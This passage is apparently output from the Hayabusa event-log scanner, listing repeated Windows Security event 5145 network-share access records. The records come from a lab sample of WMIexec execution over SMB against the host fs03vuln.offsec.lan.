0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 